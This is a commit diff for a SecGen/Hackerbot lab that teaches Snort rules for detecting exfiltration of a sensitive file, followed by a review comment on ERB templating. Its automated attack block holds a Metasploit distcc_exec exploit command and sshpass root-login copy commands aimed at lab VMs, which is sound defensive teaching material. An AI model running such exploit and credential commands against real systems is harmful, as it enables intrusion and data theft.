lab update

This commit is contained in:
Z. Cliffe Schreuders
2017-12-08 13:58:59 +00:00
parent f1590bc6c0
commit cecf892d69
3 changed files with 56 additions and 56 deletions


@@ -29,18 +29,10 @@
</generator>
</default_input>
<!--TODO: less flags-->
<default_input into="flags">
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
</default_input>
<default_input into="root_password">


@@ -14,12 +14,18 @@ Hint: you can include your sensitive data directly in a Snort rule. This is very
It is fine to monitor all ports, so long as your rule(s) detect transfer of the file.
#### Hash-based exfiltration detection
#### Regular expression-based exfiltration detection
Assuming the data you are protecting is sensitive, you likely don't want your Snort rules to contain direct copies of all your most sensitive data. For this reason, Snort rules can contain hashes to match against.
Assuming the data you are protecting is sensitive, you likely don't want your Snort rules to contain direct copies of all your most sensitive data. For this reason, Snort rules can contain regular expressions to match against.
It is possible to write Snort rules that detect the transfer of the contents of your files, based on hashes, so that the Snort rule does not contain any plain text of your document.
It is possible to write Snort rules that detect the transfer of the contents of your files, based on pattern matching, so that the Snort rule does not contain the sensitive parts of your document.
Hint: consider using the protected\_content keyword in your rule.
Hint: consider using the pcre keyword in your rule.
> Side note: *Hash-based exfiltration detection*: **you don't need to use this for this lab.**
> Assuming the data you are protecting is sensitive, you likely don't want your Snort rules to contain direct copies of all your most sensitive data. For this reason, Snort rules can contain hashes to match against.
> Using newer versions of Snort it is possible to write Snort rules that detect the transfer of the contents of your files, based on hashes (using the protected\_content keyword), so that the Snort rule does not contain any plain text of your document.
---


@@ -40,7 +40,7 @@
$sensitive_files_location = "/home/#{$main_user}/trade_secrets/"
REQUIRED_FLAGS = 10
REQUIRED_FLAGS = 3
while $flags.length < REQUIRED_FLAGS
$flags << "flag{#{SecureRandom.hex}}"
Print.err "Warning: Not enough flags provided to hackerbot_config generator, some flags won't be tracked/marked!"
@@ -167,51 +167,53 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
</attack>
<attack>
<% $rand_alert1 = SecureRandom.hex(3) %>
<!--get the snort alerts before-->
<!--and make a copy of the file to a new location -->
<pre_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $web_server_ip %> 'cp <%= $sensitive_files_location %>clients.csv <%= $rand_tmp_restingplace %>; chmod 644 <%= $rand_tmp_restingplace %>'; stat0=$?; echo -$stat0; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_before; echo --$?</pre_shell>
<!--exploit and read contents of sensitive file over the network-->
<get_shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</get_shell>
<!--trigger the rule by sending the data-->
<post_command>cat <%= $rand_tmp_restingplace %>; echo --$?</post_command>
<!--get the snort alerts after, and diff for new alerts generated-->
<post_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_after; echo --$?; diff -n /tmp/snort_alert_before /tmp/snort_alert_after | tail -n 5 | grep <%= $rand_alert1 %> >/dev/null; echo triggered:$?; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/etc/snort/rules/my.rules /tmp/snort_rules; echo rules:$?; grep '^alert.*msg:".*<%= $rand_alert1 %>.*".*protected_content:"' /tmp/snort_rules >/dev/null; echo good_rule:$? </post_shell>
<suppress_command_output_feedback />
<!--TODO: use a version of snort that supports protected_content (2.9.7+ as found in Debian Stretch) -->
<!--TODO: the below should work with the right version of Snort-->
<!--<attack>-->
<!--<% $rand_alert1 = SecureRandom.hex(3) %>-->
<!--&lt;!&ndash;get the snort alerts before&ndash;&gt;-->
<!--&lt;!&ndash;and make a copy of the file to a new location &ndash;&gt;-->
<!--<pre_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $web_server_ip %> 'cp <%= $sensitive_files_location %>clients.csv <%= $rand_tmp_restingplace %>; chmod 644 <%= $rand_tmp_restingplace %>'; stat0=$?; echo -$stat0; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_before; echo &#45;&#45;$?</pre_shell>-->
<!--&lt;!&ndash;exploit and read contents of sensitive file over the network&ndash;&gt;-->
<!--<get_shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</get_shell>-->
<!--&lt;!&ndash;trigger the rule by sending the data&ndash;&gt;-->
<!--<post_command>cat <%= $rand_tmp_restingplace %>; echo &#45;&#45;$?</post_command>-->
<!--&lt;!&ndash;get the snort alerts after, and diff for new alerts generated&ndash;&gt;-->
<!--<post_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_after; echo &#45;&#45;$?; diff -n /tmp/snort_alert_before /tmp/snort_alert_after | tail -n 5 | grep <%= $rand_alert1 %> >/dev/null; echo triggered:$?; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/etc/snort/rules/my.rules /tmp/snort_rules; echo rules:$?; grep '^alert.*msg:".*<%= $rand_alert1 %>.*".*protected_content:"' /tmp/snort_rules >/dev/null; echo good_rule:$? </post_shell>-->
<!--<suppress_command_output_feedback />-->
<prompt>Update your rule so that it doesn't contain any of the sensitive data. Use hash-based matching. You have a copy in <%= $sensitive_files_location %>clients.csv Use one or more Snort rules to detect unencrypted transport of the file. The alert must include the message "<%= $rand_alert1 %>".</prompt>
<!--<prompt>Update your rule so that it doesn't contain any of the sensitive data. Use hash-based matching. You have a copy in <%= $sensitive_files_location %>clients.csv Use one or more Snort rules to detect unencrypted transport of the file. The alert must include the message "<%= $rand_alert1 %>".</prompt>-->
<condition>
<output_matches>good_rule:1</output_matches>
<message>:( Couldn't find your snort rule on the IDS server in /etc/snort/rules/my.rules. You are missing *protected_content* matching or the message from your rule.</message>
</condition>
<condition>
<output_matches>triggered:1</output_matches>
<message>:( Your rule wasn't triggered.</message>
</condition>
<condition>
<output_matches>triggered:0.*good_rule:0</output_matches>
<message>:) Well done! <%= $flags.pop %>.</message>
<trigger_next_attack />
</condition>
<condition>
<output_matches>-1</output_matches>
<message>:( Failed to ssh to the web server (<%= $web_server_ip %>)</message>
</condition>
<condition>
<output_matches>--1</output_matches>
<message>:( Failed to scp to the ids server (<%= $ids_server_ip %>)</message>
</condition>
<condition>
<output_matches>--0</output_matches>
<message>Continuing...</message>
</condition>
<else_condition>
<message>:( Something was not quite right...</message>
</else_condition>
<!--<condition>-->
<!--<output_matches>good_rule:1</output_matches>-->
<!--<message>:( Couldn't find your snort rule on the IDS server in /etc/snort/rules/my.rules. You are missing *protected_content* matching or the message from your rule.</message>-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>triggered:1</output_matches>-->
<!--<message>:( Your rule wasn't triggered.</message>-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>triggered:0.*good_rule:0</output_matches>-->
<!--<message>:) Well done! <%= $flags.pop %>.</message>-->
<!--<trigger_next_attack />-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>-1</output_matches>-->
<!--<message>:( Failed to ssh to the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>&#45;&#45;1</output_matches>-->
<!--<message>:( Failed to scp to the ids server (<%= $ids_server_ip %>)</message>-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>&#45;&#45;0</output_matches>-->
<!--<message>Continuing...</message>-->
<!--</condition>-->
<!--<else_condition>-->
<!--<message>:( Something was not quite right...</message>-->
<!--</else_condition>-->
</attack>
<!--</attack>-->
<attack>
<% $rand_alert2 = SecureRandom.hex(3)
@@ -260,7 +262,7 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
<quiz>
<question>Where else is the sensitive data at rest? Use regexp searches to find the file (not hashes).</question>
<question>Where else is the sensitive data at rest across the various server VMs for the lab? Use regexp searches to find the file (don't use hashes).</question>
<answer><%= $rand_tmp_restingplace %></answer>
<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
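Review bot: In the 167/167 hunk, wrapping the protected_content attack in XML comments does not disable the ERB inside it: `<!--<message>:) Well done! <%= $flags.pop %>.</message>-->` still executes the pop when the template is rendered (assuming the commented copy is the new side, as the two TODO comments above it suggest), so a flag is consumed by an attack that is never presented, and with REQUIRED_FLAGS now lowered to 3 in the earlier hunk that may leave the remaining attacks one flag short. The other interpolations in the commented block, including `<%= $root_password %>`, are likewise still evaluated and emitted into the generated config inside the comment. Disabling the block at the ERB level avoids both: enclose it in `<% if false %>` … `<% end %>`, or at minimum neutralise the pop with an ERB comment, `<!--<message>:) Well done! <%# $flags.pop %>.</message>-->`. Note too that the commented copy has `--` rewritten as `&#45;&#45;` and the inner comments as `&lt;!&ndash;`, so re-enabling it later is not just a matter of stripping the comment markers.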